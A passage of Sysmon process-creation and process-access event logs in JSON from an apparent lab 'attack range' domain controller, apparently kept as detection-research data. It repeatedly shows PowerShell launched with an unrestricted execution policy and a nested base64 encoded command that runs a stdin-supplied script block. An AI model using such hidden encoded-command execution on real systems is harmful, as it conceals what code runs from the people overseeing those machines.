UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0323-5F25-0000-0020A2950700}\r\nLogonId: 0x795A2\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-0323-5F25-0000-0010CA980700}\r\nParentProcessId: 1260\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.783","ProcessGuid":"{A837DB8D-0323-5F25-0000-00109D990700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0323-5F25-0000-0020A2950700}","LogonId":"0x795a2","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-0323-5F25-0000-0010CA980700}","ParentProcessId":"1260","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4810,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.781\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-0010CA980700}\r\nSourceProcessId: 1260\r\nSourceThreadId: 3552\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-00109D990700}\r\nTargetProcessId: 3260\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.781","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-0010CA980700}","SourceProcessId":"1260","SourceThreadId":"3552","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-00109D990700}","TargetProcessId":"3260","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4811,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.781\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-00109D990700}\r\nTargetProcessId: 3260\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.781","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-00109D990700}","TargetProcessId":"3260","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4812,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+